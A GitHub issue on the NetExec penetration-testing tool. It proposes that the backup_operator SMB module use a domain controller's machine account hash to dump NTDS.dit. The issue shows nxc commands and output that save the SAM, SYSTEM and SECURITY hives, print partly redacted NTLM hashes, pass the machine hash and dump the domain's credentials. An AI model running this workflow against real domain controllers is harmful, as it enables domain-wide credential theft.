Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add option for backup_operator smb module to use the machine account to dump NTDS.dit #559

Open
Xorriath opened this issue Feb 8, 2025 · 2 comments
Open

Add option for backup_operator smb module to use the machine account to dump NTDS.dit #559

Xorriath opened this issue Feb 8, 2025 · 2 comments

Comments

@Xorriath
Copy link

Xorriath commented Feb 8, 2025

Please Describe The Problem To Be Solved
The smb module backup_operator, fails to dump NTDS.dit when the local administrator account is disabled. I eliminated some lines below for visibility and redacted others.

nxc smb 192.168.210.16 -u '<user>' -p '<password>' -M backup_operator 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\<user>:<password>
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SAM to \\192.168.210.16\SYSVOL\SAM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SYSTEM to \\192.168.210.16\SYSVOL\SYSTEM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SECURITY to \\192.168.210.16\SYSVOL\SECURITY
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SAM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SECURITY" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33e<redacted>579aa53:::  
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d<redacted>e393948
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\Administrator:5bdd6a33efe<redacted>579aa53 STATUS_LOGON_FAILURE 
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"

(Optional): Suggest A Solution
From the output above, it can be seen that the module also dumps the machine account hash which can be used to dump NTDS.dit as well. So there are 3 solutions for this:

  • The module dynamically detects that it cannot dump NTDS.dit as local administrator and then tries again using the machine account hash instead.
  • It can be added as an option to instruct the module to use the machine account hash instead of the local administrator when it tries to dump NTDS.dit
  • Always the machine account hash to dump NTDS.dit

Of the 3 solutions, the first is likely the best.
Below is a demonstration of performing the attack with netexec --ntds, thanks to bacup_operators module also providing the machine account hash:

nxc smb 192.168.210.16 -u 'ZPH-SVRCDC01$' -H d47a6d90<redacted>14e393948 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\ZPH-SVRCDC01$:d47a6d<redacted>514e393948 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:543b<redacted>8a1760d5e:::
<SNIP>
@NeffIsBack
Copy link
Contributor

Maybe the 3rd option would even be the best as there won't be an AD with a disabled DC machine account, but there will definitely (or hopefully) ones with the default DA disabled. @mpgn thoughts?

@mpgn
Copy link
Collaborator

mpgn commented Feb 8, 2025
edited
Loading

3rd option is the best yes ! But you will need to manualy delete the files so

  1. try with dom adm
  2. try with machine account

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@mpgn @NeffIsBack @Xorriath